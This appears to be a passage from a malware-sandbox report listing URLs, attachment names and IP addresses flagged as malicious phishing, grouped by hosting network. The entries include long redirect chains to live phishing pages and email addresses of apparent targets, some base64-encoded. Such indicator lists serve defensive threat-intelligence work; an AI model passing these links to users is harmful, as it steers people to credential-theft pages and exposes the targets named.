	https://www.google.co.in/amp/s/www.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%25253A%25252F%25252Flinkprotect.cudasvc.com%25252Furl%25253Fa%25253Dhttps%25253A%25252F%25252F7178.xg4ken.com%25252Fmedia%25252Fredir.php%25253Fprof%2525253D413%25252526camp%2525253D18159%25252526affcode%2525253Dcr28831%25252526k_inner_url_encoded%2525253D1%25252526cid%2525253D687200364259%25252526kdv%2525253Dt%25252526url%2525255B%2525255D%2525253Dhttps%25253A%25252F%25252Fu45144935.ct.sendgrid.net%252525252Fls%252525252Fclick%252525253Fupn%252525253Du001.LNyCn8WmnWPmQsYCyRbMo-2FBylGQnk2FM4EbtY52ttlPZ2z7h8QtApqaEbkVJ10BPJGT4-2Fj7DvBhcS8CO6whGyPO3mIBFCjiOfq1s-2B3W6ImftsvSiHhn52k01sWTdRk6-2FwzmSiNVaWLuxEF4C8wFVkcoiAazuqQT-2FPKtYaVyztH-2BfWxUKjpFo8kRftt8sdL2no-2BdVBl0jK4ecRGQ69QItUQeEGXzwqnMhd-2Bcm1Zqeg-2BvLL0WZ14WIgFg8ogLU17DNaWWFxQpDn6mKZ2wTRxLtEJpcz20mwtlGn-2F5ptdsiqxXjxl8sPQm5tYsyaWTd7xaG1RKSI433x9QqzSMaMeMSfjAsC-2FUQ5-2BQwXXR7WjWxK7s-3Dj30q_g4wqyLA8W6A9RaaELcf0r2dfZeg6QS9sMzEtFYCZNa0GHNV6fiDtGXUUYXr1QY4OWQkdxo-2BmfEnOoluK3haD-2FT-2BVvK3Rsd8Fsy-2FHZe-2FPb6bVqwAyCrGZiukV5cQNLyUdiK9NOA3x7XTvxuHh0xaXYzCfwxZgwu-2F-2B5Xr-2FFEBHbr8kZaqirOtUlzCKAKUPHc-2FJw98buIiqIhAjut2dAK3Pary6b6U1njA7Y1PusD9-2B0z9twFuPQnmtuk18PNtG2KB6Mhlt9SJ-2BpclUBNZ48I7jKHxuqOrrC4b5wfb5GCOEhMD0e6uJnUUvnAi80NIHH3i9IryJjLt7VmnvpLt50OArGmR2MFF8wzxJsAi1AM0eh8ogxdu9dXvIVRURLqCQla-2F0hxnUqsOf4k6QQ4cBCBSh7SaEZ9zrWwo7y1F-2Fe0VjKrEWXnwN9QF-2FVUhL5RleFSTK%252526c%25253DE%25252C1%25252C5bEVim247z1fGhtUhmYwbNu1H8iIZr4NrgaCfUxKZdTyuUxW48gwPUfsoILDy-FCjYA5-2MCgtJlXy5N3PAFAD47XFHidB4K4cNJC7Z-FhFR1P96vPVq%252526typo%25253D1%2526sa%253DD%2526sntz%253D1%2526usg%253DAOvVaw22Hb57adjGqtnvmWKG4rHa%26sa%3DD%26source%3Deditors%26ust%3D1718647260295520%26usg%3DAOvVaw02Zh5iAREJGq4JIy78ynch%23dHphYmFuQHJlbGlhYmxlY29udHJvbHMuY29t	Get hash	malicious	HTMLPhisher	Browse	35.158.22.11
	https://www.awin1.com/cread.php?awinmid=20923&awinaffid=580847&clickref=2&clickref5=mail86522059c430ec056e5531adb92f&ued=https%3A%2F%2Fwww.xero.com%2F	Get hash	malicious	Unknown	Browse	18.198.138.17
	https://www.google.com/url?q=https%3A%2F%2Flinkprotect.cudasvc.com%2Furl%3Fa%3Dhttps%3A%2F%2Fnews4.thomasnet.com%2Fwww%2Fdelivery%2Fck.php%3Foaparams%253D2__bannerid%253D290840__zoneid%253D0__source%253D1740802%25257C11236254%25257C41282302%25257C6812%25257C41331406__cb%253Dc02ccb05f9__oadest%253Dhttps%25253A%25252F%25252Flink.mail.beehiiv.com%25252Fls%25252Fclick%25253Fupn%25253Du001.FC1hxQg0vjMaKvj1drxxGuKT-2BG094DJrg2lg9-2FG-2BDn7QRAMLmBcxi2ye-2F-2F7EjbsbD9DxrNnwxFlLC7mBB4kmF9Nx5JHyuRngUXGjkpWEQMk4mRp9AFiVX7-2BZgaAF53RluGM8GCvkwmv5gqrtbtpF6mBCFN8Y8ck0o5BflBavB8KnfeGkHyaxX319ktcUVxlNdESJjXzDLf5cyamHA-2FAl3FGJEUNVdLj3d6ujL2-2BirPvOffPQu9FmPd5VwQPzHwZxJlTtdpVl8zMo7PAjQV9pr2NYeph8B-2B6kq7ZekkEo14FgtI93d9MoL7iDJlUFLG2v0GO0jtMba2TYCWyX067ildK9BsZpgx7VoGXvfn2aR2P02guuJmS1c5N-2BbzXRSlS4c696HSjsppgo-2BOOqCriMOIXyjax-2B2KzYoCwgmdn-2BDsaJxmCG4BMJzbVffDnvXmOnxU25pAq9xroVE9a-2B-2BIx8gj9NZG7wTTTit-2FcTg9Jd8YDZ6OZMbdlNIfc-2FRnXIjpMEn-2FjedF1-2BFG2ozJiRNKHIjXXPtDZELn2X-2BjgUu4MnIdo-3DnF4B_k5zaofJQ6PaDm4eQpA56e4xWG4OoVdk-2BXhZTssh6QwsCP88A0kMHGtSsxje-2F1AU30KTV7-2BlBTi6pp7PuMf4d7wqeQNN4Huw1SG4C0tuGL9gGqTiHWbC9BSRJjvmps05NaTwFMzBEVo0UJzya2meS-2FmVrnPkhcGc3biFSisVA2FWlcvIOk-2FijIsuLy2LdozK0ARg92NS7iou9bYRThT7sX-2FsV4yZCGeZVTBfuxTwGFJ9kuNvtlbJDKESs7aThJM2RUIAQikDXokYd0-2F6YOopU6iOGahHsqAPz-2F7OVsxEI2J-2Bil2Xp-2F-2BFswu2h7HFQlSpycpn1PSqpJxUXIra88-2FAf1BNT-2By7AQkINCI-2B8pSghycOQnELmGlM3zaTl3fTTOzHUw-2BR3I05pXXeGuubVfJSTfHxI-2Fr4GH471S-2FlKj3WIL5odUrBQ392yQ-2F33A8EMv8tnFWhIbI081ft6Uyhwh4jorg-3D-3D%26c%3DE%2C1%2C5bEVim247z1fGhtUhmYwbNu1H8iIZr4NrgaCfUxKZdTyuUxW48gwPUfsoILDy-FCjYA5-2MCgtJlXy5N3PAFAD47XFHidB4K4cNJC7Z-FhFR1P96vPVq%26typo%3D1&sa=D&sntz=1&usg=AOvVaw0dneiXzPs35uhkwcBAlGYI	Get hash	malicious	Unknown	Browse	35.156.200.122
	https://www.google.fr/amp/s/www.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%25253A%25252F%25252Flinkprotect.cudasvc.com%25252Furl%25253Fa%25253Dhttps%25253A%25252F%25252Fnews4.thomasnet.com%25252Fwww%25252Fdelivery%25252Fck.php%25253Foaparams%2525253D2__bannerid%2525253D290840__zoneid%2525253D0__source%2525253D1740802%252525257C11236254%252525257C41282302%252525257C6812%252525257C41331406__cb%2525253Dc02ccb05f9__oadest%2525253Dhttps%252525253A%252525252F%252525252Flink.mail.beehiiv.com%252525252Fls%252525252Fclick%252525253Fupn%252525253Du001.FC1hxQg0vjMaKvj1drxxGuKT-2BG094DJrg2lg9-2FG-2BDn7QRAMLmBcxi2ye-2F-2F7EjbsbD9DxrNnwxFlLC7mBB4kmF9Nx5JHyuRngUXGjkpWEQMk4mRp9AFiVX7-2BZgaAF53RluGM8GCvkwmv5gqrtbtpF6mBCFN8Y8ck0o5BflBavB8KnfeGkHyaxX319ktcUVxlNdESJjXzDLf5cyamHA-2FAl3FGJEUNVdLj3d6ujL2-2BirPvOffPQu9FmPd5VwQPzHwZxJlTtdpVl8zMo7PAjQV9pr2NYeph8B-2B6kq7ZekkEo14FgtI93d9MoL7iDJlUFLG2v0GO0jtMba2TYCWyX067ildK9BsZpgx7VoGXvfn2aR2P02guuJmS1c5N-2BbzXRSlS4c696HSjsppgo-2BOOqCriMOIXyjax-2B2KzYoCwgmdn-2BDsaJxmCG4BMJzbVffDnvXmOnxU25pAq9xroVE9a-2B-2BIx8gj9NZG7wTTTit-2FcTg9Jd8YDZ6OZMbdlNIfc-2FRnXIjpMEn-2FjedF1-2BFG2ozJiRNKHIjXXPtDZELn2X-2BjgUu4MnIdo-3DnF4B_k5zaofJQ6PaDm4eQpA56e4xWG4OoVdk-2BXhZTssh6QwsCP88A0kMHGtSsxje-2F1AU30KTV7-2BlBTi6pp7PuMf4d7wqeQNN4Huw1SG4C0tuGL9gGqTiHWbC9BSRJjvmps05NaTwFMzBEVo0UJzya2meS-2FmVrnPkhcGc3biFSisVA2FWlcvIOk-2FijIsuLy2LdozK0ARg92NS7iou9bYRThT7sX-2FsV4yZCGeZVTBfuxTwGFJ9kuNvtlbJDKESs7aThJM2RUIAQikDXokYd0-2F6YOopU6iOGahHsqAPz-2F7OVsxEI2J-2Bil2Xp-2F-2BFswu2h7HFQlSpycpn1PSqpJxUXIra88-2FAf1BNT-2By7AQkINCI-2B8pSghycOQnELmGlM3zaTl3fTTOzHUw-2BR3I05pXXeGuubVfJSTfHxI-2Fr4GH471S-2FlKj3WIL5odUrBQ392yQ-2F33A8EMv8tnFWhIbI081ft6Uyhwh4jorg-3D-3D%252526c%25253DE%25252C1%25252C5bEVim247z1fGhtUhmYwbNu1H8iIZr4NrgaCfUxKZdTyuUxW48gwPUfsoILDy-FCjYA5-2MCgtJlXy5N3PAFAD47XFHidB4K4cNJC7Z-FhFR1P96vPVq%252526typo%25253D1%2526sa%253DD%2526sntz%253D1%2526usg%253DAOvVaw0dneiXzPs35uhkwcBAlGYI%26sa%3DD%26source%3Deditors%26ust%3D1718388339083604%26usg%3DAOvVaw0YeSd	Get hash	malicious	Unknown	Browse	35.157.172.82
	https://www.google.fr/amp/s/www.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%25253A%25252F%25252Flinkprotect.cudasvc.com%25252Furl%25253Fa%25253Dhttps%25253A%25252F%25252Fnews4.thomasnet.com%25252Fwww%25252Fdelivery%25252Fck.php%25253Foaparams%2525253D2__bannerid%2525253D290840__zoneid%2525253D0__source%2525253D1740802%252525257C11236254%252525257C41282302%252525257C6812%252525257C41331406__cb%2525253Dc02ccb05f9__oadest%2525253Dhttps%252525253A%252525252F%252525252Flink.mail.beehiiv.com%252525252Fls%252525252Fclick%252525253Fupn%252525253Du001.FC1hxQg0vjMaKvj1drxxGuKT-2BG094DJrg2lg9-2FG-2BDn7QRAMLmBcxi2ye-2F-2F7EjbsbD9DxrNnwxFlLC7mBB4kmF9Nx5JHyuRngUXGjkpWEQMk4mRp9AFiVX7-2BZgaAF53RluGM8GCvkwmv5gqrtbtpF6mBCFN8Y8ck0o5BflBavB8KnfeGkHyaxX319ktcUVxlNdESJjXzDLf5cyamHA-2FAl3FGJEUNVdLj3d6ujL2-2BirPvOffPQu9FmPd5VwQPzHwZxJlTtdpVl8zMo7PAjQV9pr2NYeph8B-2B6kq7ZekkEo14FgtI93d9MoL7iDJlUFLG2v0GO0jtMba2TYCWyX067ildK9BsZpgx7VoGXvfn2aR2P02guuJmS1c5N-2BbzXRSlS4c696HSjsppgo-2BOOqCriMOIXyjax-2B2KzYoCwgmdn-2BDsaJxmCG4BMJzbVffDnvXmOnxU25pAq9xroVE9a-2B-2BIx8gj9NZG7wTTTit-2FcTg9Jd8YDZ6OZMbdlNIfc-2FRnXIjpMEn-2FjedF1-2BFG2ozJiRNKHIjXXPtDZELn2X-2BjgUu4MnIdo-3DnF4B_k5zaofJQ6PaDm4eQpA56e4xWG4OoVdk-2BXhZTssh6QwsCP88A0kMHGtSsxje-2F1AU30KTV7-2BlBTi6pp7PuMf4d7wqeQNN4Huw1SG4C0tuGL9gGqTiHWbC9BSRJjvmps05NaTwFMzBEVo0UJzya2meS-2FmVrnPkhcGc3biFSisVA2FWlcvIOk-2FijIsuLy2LdozK0ARg92NS7iou9bYRThT7sX-2FsV4yZCGeZVTBfuxTwGFJ9kuNvtlbJDKESs7aThJM2RUIAQikDXokYd0-2F6YOopU6iOGahHsqAPz-2F7OVsxEI2J-2Bil2Xp-2F-2BFswu2h7HFQlSpycpn1PSqpJxUXIra88-2FAf1BNT-2By7AQkINCI-2B8pSghycOQnELmGlM3zaTl3fTTOzHUw-2BR3I05pXXeGuubVfJSTfHxI-2Fr4GH471S-2FlKj3WIL5odUrBQ392yQ-2F33A8EMv8tnFWhIbI081ft6Uyhwh4jorg-3D-3D%252526c%25253DE%25252C1%25252C5bEVim247z1fGhtUhmYwbNu1H8iIZr4NrgaCfUxKZdTyuUxW48gwPUfsoILDy-FCjYA5-2MCgtJlXy5N3PAFAD47XFHidB4K4cNJC7Z-FhFR1P96vPVq%252526typo%25253D1%2526sa%253DD%2526sntz%253D1%2526usg%253DAOvVaw0dneiXzPs35uhkwcBAlGYI%26sa%3DD%26source%3Deditors%26ust%3D1718388339083604%26usg%3DAOvVaw0YeSd	Get hash	malicious	Unknown	Browse	35.157.172.82
	https://linkprotect%2Ecudasvc%2Ecom/url?a=https%3A%2F%2Fdragdropgo.com/wp-content/themes/gobi/&c=E,1,#iksung.choi@hyundaielevator.com	Get hash	malicious	HTMLPhisher	Browse	35.156.200.122
	https://www.google.co.in/amp/s/www.google.com%2Furl%3Fq%3Dhttps%253A%252F%252Flinkprotect.cudasvc.com%252Furl%253Fa%253Dhttps%253A%252F%252Fwww.visaliakawasaki.com%252FElementSettings%252Fwww.visaliakawasaki.com%252FViewSwitcher%252FSwitchView%253Fmobile%25253DTrue%252526returnUrl%25253Dhttps%253A%252F%252Fu44590137.ct.sendgrid.net%2525252Fls%2525252Fclick%2525253Fupn%2525253Du001.GjIPgTulbfriEzQws5bSKQ0tBwgDf638cPIbrF7bBS8NN2MSd8LfwpRfwqfZEGcjwx-2FiuTfrARoUEAvK7M4n-2BAg1-2F-2FELp5mbBCr0JpdUspiR4oOxJWlS78YEBXijZzkpDiow2nY9KnoFU4ondac8lETPxsyfIct1leS36BfzpkQFKz3TSN9vr61CiVS4uHuNxHob1YUQlV-2BuCeGkvPZJV-2Fo6nAK0QlEj0EmBYAIy3ug8F51T3ZDa-2B0U9lsOqpmba-2FjupN30EfyuEJ9V8e6kbUqxVB0dBioMo5Q1FZl2HioSDtvdcNiAGq-2FmCD-2BpOCdTj4QHZ1svLtVhW3tuPt3TtsKIhMyEQSCBs4KE0QMxTg7Tz3z8lSQNT9N-2Fv2njFNugtWC55_ePYPF6nkF-2BGqBPgpX-2FhQmioAe0Ok4T3S5or1jtZ-2Ff383C4htchEL8ALyz-2FlVDREoFm5EYW0CKJH8Ggnzzvs7KZs3lddF5XzBqvbWlUq3b7V8WyhGiFvjiJtK7QU5N-2Bw2l0QVeej2h7lohWb4z7akLA6ULkTMilx4MGaOA76Y-2F5HTpAh-2FdbwkpAokcG5eM9Rgxr4DfjrCXIjRfG-2BxidDnJzSHi3PNzjjg2x85tMoFNvNhO8MXLTCfsTp2viUCW4cwXWH41yL3YRc97LTzO-2Bs1tiekgXBuymyjOOUCwrfeaoXHwdrUnOC9lLkSCEyEphHHVSUXTRheWH0LQ7d2Vy6YeuU-2FjUnSGfGD3ETh0RWvsTi4KIuS1qozJTidO-2BKbzSC9TN6-2FxeDkpH2v1OcpEc8Fy-2FLfywg7-2FYgWvv7vnLqr0rtoJRdMZ5ykC1gZl1L6PvUe%2526c%253DE%252C1%252C5bEVim247z1fGhtUhmYwbNu1H8iIZr4NrgaCfUxKZdTyuUxW48gwPUfsoILDy-FCjYA5-2MCgtJlXy5N3PAFAD47XFHidB4K4cNJC7Z-FhFR1P96vPVq%2526typo%253D1%26sa%3DD%26sntz%3D1%26usg%3DAOvVaw1azOLVizvjWw-irSjGm96x#dGhhbGxAb3AtZi5vcmc=	Get hash	malicious	HTMLPhisher	Browse	3.72.131.113

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	(No subject) (30).eml	Get hash	malicious	HTMLPhisher	Browse	52.98.178.242
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adILp4_JhWgToIvlhf8IbyXGrG8GglWu5d4OO3mWF7G0NW268WP5xHPAH91Smpp-2FtRR9XuZpKnKdg4HDhWDJjJJqbsy3CETEnNy05m5SD4mKlJNLbHb9HbmD7EWJkqf98w2dIvZium8i4zWFkqRVKAxKp4ASC-2Fsc2qaOwL1HipMLWQLyXnDciGaAPfs5ThB8LH4A4fjOpAnQHDnaqDId42Y7pIhFkhd9sQB37NkzuC5dZa48XY-3D	Get hash	malicious	Unknown	Browse	20.49.124.158
	robert e-Doc File_170024.docx	Get hash	malicious	HTMLPhisher	Browse	40.126.32.138
	https://assets-usa.mkt.dynamics.com/165a2e8c-373d-ef11-8e49-000d3a8f6e27/digitalassets/standaloneforms/a85836a1-f33d-ef11-8409-002248344b7e	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adSQKz_p4A4YQt8epDIK9HlKea9sSCl3MXKBcpnU56jmD4aRDdTAeOMJcZw3f8VvV8NLbbjL0uMrdxhQK8GxzwqBkLcmylT-2FEY5XbwR3K-2FC6xfqqGuExQq3SNizKWxflJyHsJI0nslnt0a8xlK3Fd8H-2FKOV3XlJnsljFNByTu7JCMLXg-2BPQ54flDZp4tHyGuD3hMkJOlLEAOp0eJSpzLMOMd9b3yw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	52.146.76.30
	https://infra-metals-com.fortimailcloud.com/fmlurlsvc/?fewReq=:B:JVc9NjQ1PSFxOjUpNyFuYzo3Nj03NiF0bmBpZnNydWI6MDJkNz43ZDFkNjc2MTVjZDA+PmM3ZGE2Y2NjMzczYjczNzNmNTMxNSFzOjYwNTcyMzAzNzchdm5jOjMxPk9oN2tNNDE/Nj8wNiozMT5PaDdrTDQxPzY/MDYhdWR3czohZDo1MyFvY2s6Nw==&url=https%3a%2f%2fapp.box.com%2fs%2f85jljehjkk29pmgilaop1n5jhwf19q71	Get hash	malicious	HTMLPhisher	Browse	40.99.150.82
	https://faragozin.com/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://m.exactag.com/ai.aspx?tc=d9056318bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Abpwebdesign.co.za%2ftiftb	Get hash	malicious	HTMLPhisher	Browse	13.107.21.237
	https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fjbcloudcm.com%2FShare%2FDocuments%3FItemsView%3D6d2bef0fc2cc8abdc0d7d5a46222227c%26name%3DTXV6emFtaWwgS2FzaGlm%26ga%3D1&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Famer%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=PoYadgo9Ls3mgvlx0kuPEMxm%252bwTOMYiZ46lyzlCU8xIBr3LW%252bL0o12kVt7%252fmStF%252bOCnsuO3Ogupz80PvFn%252b9%252beAaEjtKV9RTSMxWAvC%252fOcGEqJZX4%252fjz5SalQaE6KDe81hPWSAzI%252b6PXUvP4pm8mAkM8cI9kAgB1plEWjlEONeRUkn4i8%252fBTHH2UJdrtmZdMCC5B64UKWqUXmocfkEKdnXh037fS0CUzlrO7tWEl8uyXZp9xGkBALiWtac8fMmK%252fbPSLtkCjGL8TpdseALvO8etXLFoaIVe72C6DW9NU7rP3aCDaxIJG%252fBvsM1M%252fuP5zUaJ2kD3EY%252fnGpVtqhk0DyOl4NqTNaW4BdakLhDjJnswqOilNaPwObC6yEuwBNIuBmuNE3NpIPamphR21b6RQVqifNQb%252b2uOcIWEy50MNDI2bx%252fR11clXIMktl2rtHtNJGRgeciOmnOBmEvF4pQoe5xKacUHq2LTTknqh4SGJB3oqiko4gKhQEbZgfurA2bVPJXfGTxCeMLAti8rkwHOFQfAC%252fNHSQfrzzk9hlciRDLqxA%252fY9RpyiFTLlr%252fuIq3dpU%252bRWh4FFOsdvjE5cAAaS2MNcpnM15pW7GjJsF9zZ0%252fc%252b7ek%252bvjsFypc0VeTv4Gq1PMrjlv7u%252f1EVQ7zVcUKsLWKc2QfbVN54h8gZNxKUMYq0WyjvEio9TrHD%252fZByQ8S%252bqyhwlJ4a4rdkrcOu6zQF9kWcFtOb0WQQ18j5tI6Iazc8%252fkhFC6HHtkN8dOP%252bp1sZYOZ0R5b5%252f8eMWDy9Hw2PG8FvASO93EPlZ%252boGptDKsNNeUmVDeuGAMA%252bbsJd9fOhC2A302fyXgfVASjfZ0WS3kO4xuwkgMO%252bccYwPpAM%252f1f97zxXK%252fbgY9NP7i%252fZ5qqCNI%252fk63RPxiXiD%252fIyTu4bcfVTwrIayQMNFREVh1hiGhMF%252bJR%252fedscJy%252bRrGVrSEHi7YhPsc0AKvGwd7wOmU%252fVlJzzm4meOFczCdroxBZ7Sx6zZ78qtQDar7bBCiE43ceuLt%252f6HEC3n8KZG2Wny7P16mS5VQBkd2ZWxKa%252f1omxrcvBRo1lYYONsjHmgJwfFFunU%252fW6XVXk1RKoHZDaOeELeQ6WI45oOWJ5CJVoPSEAYBd4kLkxDWc6wNYVGBYDwmKMP7HmK5ms1LS8tIGwZ5brVn%252bSpCSUAMFzTTgIUuT1QDbMybVzmP3y9K4QlrQjAbraW7R4UzSGdQltnFavU69Bezo1KHe1VaWW8zNRyvJgsicwEuFbuf%252bTk2%252bpEzTrxlqJDCsgCvHi%252fhTi1CYIWW6hOpAGwPr1i%252bRMuQRY2I4ft7THOB0aAE3DEaSpRvw0vnbU%252ftAzogk78QKyIlNhBDjJhL%252fG5o6sNvsax4MlOLFYpqMdQlcy%252fEpN5bbLt0BXSYyJfUFinyW0ZZjPNKZUSd1AtoEAKLE3O2LgXtgUQ3x	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	L Catterton Financial Report.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
AMAZON-02US	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adILp4_JhWgToIvlhf8IbyXGrG8GglWu5d4OO3mWF7G0NW268WP5xHPAH91Smpp-2FtRR9XuZpKnKdg4HDhWDJjJJqbsy3CETEnNy05m5SD4mKlJNLbHb9HbmD7EWJkqf98w2dIvZium8i4zWFkqRVKAxKp4ASC-2Fsc2qaOwL1HipMLWQLyXnDciGaAPfs5ThB8LH4A4fjOpAnQHDnaqDId42Y7pIhFkhd9sQB37NkzuC5dZa48XY-3D	Get hash	malicious	Unknown	Browse	18.244.18.27
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adSQKz_p4A4YQt8epDIK9HlKea9sSCl3MXKBcpnU56jmD4aRDdTAeOMJcZw3f8VvV8NLbbjL0uMrdxhQK8GxzwqBkLcmylT-2FEY5XbwR3K-2FC6xfqqGuExQq3SNizKWxflJyHsJI0nslnt0a8xlK3Fd8H-2FKOV3XlJnsljFNByTu7JCMLXg-2BPQ54flDZp4tHyGuD3hMkJOlLEAOp0eJSpzLMOMd9b3yw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	18.245.175.30
	https://infra-metals-com.fortimailcloud.com/fmlurlsvc/?fewReq=:B:JVc9NjQ1PSFxOjUpNyFuYzo3Nj03NiF0bmBpZnNydWI6MDJkNz43ZDFkNjc2MTVjZDA+PmM3ZGE2Y2NjMzczYjczNzNmNTMxNSFzOjYwNTcyMzAzNzchdm5jOjMxPk9oN2tNNDE/Nj8wNiozMT5PaDdrTDQxPzY/MDYhdWR3czohZDo1MyFvY2s6Nw==&url=https%3a%2f%2fapp.box.com%2fs%2f85jljehjkk29pmgilaop1n5jhwf19q71	Get hash	malicious	HTMLPhisher	Browse	18.239.18.117
	https://witechmonth.com/	Get hash	malicious	Unknown	Browse	18.238.243.93
	http://9yhbs.contnova.srv.br/#X7	Get hash	malicious	Unknown	Browse	18.239.94.101
	https://m.exactag.com/ai.aspx?tc=d9056318bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Abpwebdesign.co.za%2ftiftb	Get hash	malicious	HTMLPhisher	Browse	18.245.175.78
	https://hootbio.com/kinecta	Get hash	malicious	Unknown	Browse	13.227.83.14
	L Catterton Financial Report.html	Get hash	malicious	HTMLPhisher	Browse	18.239.83.108
	https://www.canva.com/link?target=https%3A%2F%2Fhua.n8xgn.com%2FhUA%2F&design=DAGKdwTkY28&accessRole=viewer&linkSource=document	Get hash	malicious	Unknown	Browse	65.9.86.39
	https://qrco.de/bfDaL9	Get hash	malicious	HTMLPhisher	Browse	108.156.60.45
MICROSOFT-CORP-MSN-AS-BLOCKUS	(No subject) (30).eml	Get hash	malicious	HTMLPhisher	Browse	52.98.178.242
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adILp4_JhWgToIvlhf8IbyXGrG8GglWu5d4OO3mWF7G0NW268WP5xHPAH91Smpp-2FtRR9XuZpKnKdg4HDhWDJjJJqbsy3CETEnNy05m5SD4mKlJNLbHb9HbmD7EWJkqf98w2dIvZium8i4zWFkqRVKAxKp4ASC-2Fsc2qaOwL1HipMLWQLyXnDciGaAPfs5ThB8LH4A4fjOpAnQHDnaqDId42Y7pIhFkhd9sQB37NkzuC5dZa48XY-3D	Get hash	malicious	Unknown	Browse	20.49.124.158
	robert e-Doc File_170024.docx	Get hash	malicious	HTMLPhisher	Browse	40.126.32.138
	https://assets-usa.mkt.dynamics.com/165a2e8c-373d-ef11-8e49-000d3a8f6e27/digitalassets/standaloneforms/a85836a1-f33d-ef11-8409-002248344b7e	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://u45299662.ct.sendgrid.net/ls/click?upn=u001.wCtd840MCvZfLUcfa1aXO9SBoWuHiRLSNXNhRali-2BZej9HHpRmK-2B9ob-2BZ1xtp8gIxmD1cCIXeHa-2BKqasv1Ey4mYn41zKpx2itihC3je5Cd5BosUOMKimQFkgDf6rbBJ-2Ff9GyB7CUB6gojEnZ8aQijZcKDQBJlQibMFHRXZzRwxgvqcRr2lkK5x3cgkmbGpqYgVzt3IjDJRQQEAiTJ5yELMlxlIBCPTsF64HZOUd0nOyw-2BgdFzN5XbdFmUlyver-2FotHw04t6vNDWSt74Nf9ou2Hf5I7S6Oj4-2BwVk-2BuMgCGm7nWYdtfADrPE1jvv-2BfT3adSQKz_p4A4YQt8epDIK9HlKea9sSCl3MXKBcpnU56jmD4aRDdTAeOMJcZw3f8VvV8NLbbjL0uMrdxhQK8GxzwqBkLcmylT-2FEY5XbwR3K-2FC6xfqqGuExQq3SNizKWxflJyHsJI0nslnt0a8xlK3Fd8H-2FKOV3XlJnsljFNByTu7JCMLXg-2BPQ54flDZp4tHyGuD3hMkJOlLEAOp0eJSpzLMOMd9b3yw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	52.146.76.30
